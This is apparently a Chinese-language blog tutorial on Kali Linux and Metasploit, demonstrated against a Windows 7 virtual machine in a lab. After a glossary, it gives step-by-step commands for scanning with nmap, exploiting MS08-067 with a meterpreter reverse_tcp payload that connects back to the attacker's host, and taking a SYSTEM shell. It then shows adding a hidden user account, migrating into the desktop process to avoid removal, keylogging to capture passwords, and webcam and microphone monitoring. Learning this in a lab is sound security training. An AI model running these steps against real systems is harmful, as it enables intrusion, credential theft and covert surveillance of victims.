渗透测试实战_kali渗透测试实战

一.渗透测试案例

1.Metasploit（渗透测试神器）

下载kali，kali上有很多做渗透测试的驱动，该软件在kali中就有

专业术语

• Exploit（渗透攻击）：子弹头，利用系统，应用或者服务中的安全漏洞，所进行的攻击行为。流行的渗透攻击技术包括缓存区溢出、WEB应用程序漏洞攻击（SQL注入、XSS等），以及利用配置错误等。
• Payload（攻击荷载）：火药，被渗透攻击后去执行的代码，在Metasploit中可以自由选择、传送和植入。
• ShellCode：是攻击荷载运行的一组机器指令，通常用汇编语言。
• Module：使用的软件代码组件
• Listener（监听器）：是Metasploit中用来等待接入网络连接主机的组件。

常用术语

• 肉鸡：傀儡机，可以随意被控制的电脑和服务器。
• 木马：用来获取用户权限的程序或者代码段
• 后门：方便二次进入系统留下的后门程序
• 拿Shell：拿到对方的命令执行环境
• webshell：通过web入侵的脚本工具，对网站服务进行一定程度的控制
• poc：验证漏洞存在的代码或者程序
• exp：漏洞利用的代码或者程序
• Payload：有效攻击荷载，可以是一段代码，被隐藏并且秘密发送的信息。

2.主机漏洞利用演示

MS17-010 :永恒之蓝漏洞（勒索）

软件：Vmware Workstation 14

攻击机：kali

靶机环境：Win7

MS08-067 缓存区溢出漏洞

3.nmap 网络扫描工具

全名：network mapper

对ip地址段扫描 ，看目标网络上有哪些主机存活，哪些服务开放，甚至知道网络中用了哪种类型的防火墙设备

扫描命令:

 4.渗透测试操作

1.打开kali  

2.命令行输入msfconsole启动metasploit

3.输入nmap启动nmap

4.输入nmap -F 192.168.10.0/24进行扫描

5.需要在网络配置器中设置在同一个网段，在windows中自动获取

6.-F快速扫描出使用的端口，可以进行攻击

7.search ms08-067 查看漏洞是否有对应的攻击代码

8.use （对应代码）/（对应编号）

9.进入exploit攻击代码的模块中，添加攻击效果（设置PAYLOAD）

set PAYLOAD windows/meterpreter/reverse_tcp

功能为反转tcp，针对windows，利用meterpreter神器，该神器中集成了很多指令，方便简单操作，打进去后，反弹一个tcp连接回来，拿到相应的Shell，shell隐藏在meterpreter

10.设置完后，输入show options查看参数，空白的需要填，

如图，需要设置RHOSTS和LHOST，RHOSTS目标主机，LHOST监听主机

11.分别输入set RHOSTS 目标地址

                   set LHOST 自己的地址

12.输入run或者exploit则开始攻击

 出现该页面表示入侵成功  在自己电脑的4444端口接受，对对方的445端口进行攻击

13.输入ps可以查看被攻击电脑的进程

输入getuid 显示自己拿到了最高权限SYSTEM

输入shell进入对方电脑的命令行（system32）：里面存放了大量的工具

输入net user 查看用户

输入net user HVV 123456 /add 可以添加用户（提升为管理员，隐藏）

细思极恐，如果电脑系统中存在一些未公布的漏洞，则自己的电脑是非常危险的。

最后输入exit退出windows命令行进入到神器中。

14.在meterpreter中输入webcam_

在输入webcam_list 可以查看摄像头

输入ps 可以查看运行的进程

该进程表示桌面

15. 输入migrate 1996 本身产生的session是留有痕迹的 而输入该命令可以将session迁移到桌面，伴生。不容易被干掉。

输入key

输入keyscan_start开启键盘的监听

当对方的键盘产生输入（可能输入某平台账号密码）

输入keyscan_dump此时在命令行显示了被攻击电脑键盘所输入的内容

16.类似操作很多，监听麦克风，摄像头，可以弹记事本。